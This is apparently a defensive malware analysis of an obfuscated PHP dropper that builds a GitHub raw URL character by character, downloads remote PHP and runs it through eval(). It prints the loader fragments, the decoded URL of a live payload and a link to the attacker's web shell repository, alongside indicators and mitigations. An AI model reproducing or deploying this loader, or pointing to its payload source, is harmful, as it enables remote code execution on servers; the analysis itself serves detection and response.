PHP Malware Analysis: Obfuscated Remote Loader Using GitHub

Executive Summary

The PHP script analyzed below is a malicious remote loader (dropper) designed to fetch and execute attacker-controlled PHP code from an external source. While the local file appears small and harmless, it enables full remote code execution (RCE) on the hosting server.

This malware relies on:

• Heavy string obfuscation
• Environment capability checks
• Trusted infrastructure abuse (GitHub raw content)
• Dynamic execution via eval()

Once deployed, the server is effectively under attacker control.

Threat Classification

Category	Value
Malware type	PHP Loader / Webshell Dropper
Payload location	Remote (GitHub)
Execution method	eval()
Obfuscation	String concatenation
Persistence	External / attacker-controlled
Severity	Critical

Code Overview

At a glance, the file:

• Builds a hidden URL character-by-character
• Determines the best method to fetch remote content
• Downloads a remote PHP payload
• Executes it directly in memory

The actual malicious logic does not exist locally — it is retrieved at runtime.

Technical Analysis

1. URL Obfuscation

$_u = 'h' . 't' . 't' . 'p' . 's' . ':' . '/' . '/' . 'r' . 'a' . 'w' . '.' . 'g' . 'i' . 't' . 'h' . 'u' . 'b' . 'u' . 's' . 'e' . 'r' . 'c' . 'o' . 'n' . 't' . 'e' . 'n' . 't' . '.' . 'c' . 'o' . 'm' . '/' . 'i' . 'n' . 'd' . 'o' . 'c' . 's' . 'e' . 'c' . '/' . 'f' . 'u' . 'c' . 'k' . '/' . 'r' . 'e' . 'f' . 's' . '/' . 'h' . 'e' . 'a' . 'd' . 's' . '/' . 'm' . 'a' . 'i' . 'n' . '/' . 'v' . '8' . '.' . 'p' . 'h' . 'p';

⚠️ Obfuscation Malware Code

Click here to view malware Obfuscation source code (backup4.php)

Decoded URL:

https://raw.githubusercontent.com/indocsec/fuck/refs/heads/main/v8.php

⚠️ Malware Code

Click here to view malware source code (v8.php)

Why this matters:

• Avoids signature-based detection
• Prevents easy discovery via static scanning
• Conceals malicious intent from administrators

Using GitHub raw content allows attackers to:

• Hide among legitimate traffic
• Update payloads instantly
• Bypass reputation-based filters

2. Security Control Bypass (Environment Checks)

ini_get('allow_url_fopen')
function_exists('curl_init')

The malware dynamically selects the most reliable data exfiltration method based on server configuration.

Fallback logic:

• file_get_contents() if allow_url_fopen is enabled
• cURL if direct file access is disabled

This significantly increases success across shared hosting environments.

3. Payload Retrieval Both methods silently download attacker-controlled PHP code. Key traits:

• No user input required
• No file written to disk
• No validation of downloaded content
• Short timeout to avoid suspicion This makes detection via file monitoring difficult.

4. Arbitrary Code Execution

eval('?>' . call_user_func($_b64, base64_encode($_out)));

This is the core malicious behavior.

Even though the payload is briefly base64-encoded and decoded (a meaningless step technically), the result is:

Execution of arbitrary PHP code with full server privileges

Impact includes:

• Webshell deployment
• Database access
• Credential theft
• Spam or phishing hosting
• Lateral movement

5. Deceptive Error Handling

echo 'Gagal load';

“Gagal load” translates to “Failed to load” (Indonesian).

This is intentional:

• Looks like a broken plugin or backup
• Reduces admin suspicion
• Delays investigation

Indicators of Compromise (IOCs)

Suspicious PHP Patterns

• Obfuscated strings using 'a'.'b'.'c'
• eval() with remote content
• call_user_func() for common functions
• Dynamic construction of function names
• GitHub raw URLs inside PHP

Behavioral Indicators

• Unexpected outbound HTTP(S) requests
• PHP processes initiating network traffic
• New PHP files named like backup, cache, old, tmp

Detection Challenges

This malware often shows low antivirus detection rates because:

• No static payload exists locally
• The real malware is fetched at runtime
• Many scanners do not emulate PHP execution
• GitHub is a trusted domain

A single heuristic detection is expected, not reassuring.

Mitigation & Response

Immediate Actions

• Remove the file immediately
• Assume full server compromise
• Rotate all credentials, including:
  • Database usernames and passwords
  • FTP / SFTP credentials
  • SSH keys and passwords
• Inspect web server logs for suspicious outbound HTTP/HTTPS connections
• Search for similar obfuscation patterns across the codebase (string concatenation, eval(), call_user_func())

---

Hardening Recommendations

• Disable allow_url_fopen in php.ini
• Restrict or fully disable use of eval()
• Enforce open_basedir restrictions
• Monitor outbound network traffic from the web server
• Deploy File Integrity Monitoring (FIM) to detect unauthorized file changes

---

Why This Malware Is Effective

• Minimal on-disk footprint
• No local payload stored on the server
• Abuse of trusted infrastructure (e.g., GitHub raw content)
• Simple but highly reliable execution logic
• Highly effective on low-cost shared hosting environments

This is not noisy malware — it is intentionally designed for stealth and long-term persistence.

📌 Hacker Account / Tool Repository

⚠️ SECURITY WARNING

This repository contains a PHP web shell / file manager (CSEC Shell 0.8) that provides powerful server‑side capabilities such as file access, command execution, and system control.

Do NOT deploy this on production or third‑party systems. Use only for educational, forensic analysis, or on servers you fully own and control.

Misuse of this code may lead to server compromise, data loss, or legal consequences.

Check out this GitHub repository:

🔗 Click here to view Hacker Account / Tool Repository